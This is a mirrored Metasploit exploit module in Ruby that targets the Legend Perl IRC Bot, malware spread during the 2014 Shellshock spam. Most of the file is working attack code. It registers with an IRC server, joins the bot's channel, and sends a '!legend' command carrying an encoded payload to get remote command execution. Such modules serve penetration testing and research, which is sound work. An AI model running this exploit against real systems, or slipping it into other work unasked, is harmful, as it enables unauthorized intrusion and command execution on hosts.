CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/legend_bot_exec.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Legend Perl IRC Bot Remote Code Execution',

14
      'Description'    => %q{

15
          This module exploits a remote command execution on the Legend Perl IRC Bot.

16
          This bot has been used as a payload in the Shellshock spam last October 2014.

17
          This particular bot has functionalities like NMAP scanning, TCP, HTTP, SQL, and

18
          UDP flooding, the ability to remove system logs, and ability to gain root, and

19
          VNC scanning.

20


21
          Kevin Stevens, a Senior Threat Researcher at Damballa, has uploaded this script

22
          to VirusTotal with a md5 of 11a9f1589472efa719827079c3d13f76.

23
        },

24
      'Author'         =>

25
        [

26
          'Jay Turla' # msf and initial discovery

27
          #MalwareMustDie

28
        ],

29
      'License'        => MSF_LICENSE,

30
      'References'     =>

31
        [

32
          [ 'OSVDB', '121681' ],

33
          [ 'EDB', '36836' ],

34
          [ 'URL', 'https://www.damballa.com/perlbotnado/' ],

35
          [ 'URL', 'http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html' ] # Shellshock spam October 2014 details

36
        ],

37
      'Platform'       => %w{ unix win },

38
      'Arch'           => ARCH_CMD,

39
      'Payload'        =>

40
        {

41
          'Space'    => 300, # According to RFC 2812, the max length message is 512, including the cr-lf

42
          'DisableNops' => true,

43
          'Compat'      =>

44
            {

45
              'PayloadType' => 'cmd'

46
            }

47
        },

48
      'Targets'  =>

49
        [

50
          [ 'Legend IRC Bot', { } ]

51
        ],

52
      'Privileged'     => false,

53
      'DisclosureDate' => '2015-04-27',

54
      'DefaultTarget'  => 0))

55


56
    register_options(

57
      [

58
        Opt::RPORT(6667),

59
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),

60
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),

61
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])

62
      ])

63
  end

64


65
  def post_auth?

66
    true

67
  end

68


69
  def check

70
    connect

71


72
    res = register(sock)

73
    if res =~ /463/ || res =~ /464/

74
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")

75
      return Exploit::CheckCode::Unknown

76
    end

77


78
    res = join(sock)

79
    if !res =~ /353/ && !res =~ /366/

80
      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")

81
      return Exploit::CheckCode::Unknown

82
    end

83


84
    quit(sock)

85
    disconnect

86


87
    if res =~ /auth/ && res =~ /logged in/

88
      Exploit::CheckCode::Vulnerable

89
    else

90
      Exploit::CheckCode::Safe

91
    end

92
  end

93


94
  def send_msg(sock, data)

95
    sock.put(data)

96
    data = ""

97
    begin

98
      read_data = sock.get_once(-1, 1)

99
      while !read_data.nil?

100
        data << read_data

101
        read_data = sock.get_once(-1, 1)

102
      end

103
    rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e

104
      elog(e)

105
    end

106


107
    data

108
  end

109


110
  def register(sock)

111
    msg = ""

112


113
    if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?

114
      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"

115
    end

116


117
    if datastore['NICK'].length > 9

118
      nick = rand_text_alpha(9)

119
      print_error("The nick is longer than 9 characters, using #{nick}")

120
    else

121
      nick = datastore['NICK']

122
    end

123


124
    msg << "NICK #{nick}\r\n"

125
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

126


127
    send_msg(sock,msg)

128
  end

129


130
  def join(sock)

131
    join_msg = "JOIN #{datastore['CHANNEL']}\r\n"

132
    send_msg(sock, join_msg)

133
  end

134


135
  def legend_command(sock)

136
    encoded = payload.encoded

137
    command_msg = "PRIVMSG #{datastore['CHANNEL']} :!legend #{encoded}\r\n"

138
    send_msg(sock, command_msg)

139
  end

140


141
  def quit(sock)

142
    quit_msg = "QUIT :bye bye\r\n"

143
    sock.put(quit_msg)

144
  end

145


146
  def exploit

147
    connect

148


149
    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")

150
    res = register(sock)

151
    if res =~ /463/ || res =~ /464/

152
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")

153
      return

154
    end

155


156
    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")

157
    res = join(sock)

158
    if !res =~ /353/ && !res =~ /366/

159
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")

160
      return

161
    end

162


163
    print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")

164
    legend_command(sock)

165


166
    quit(sock)

167
    disconnect

168
  end

169
end

170


171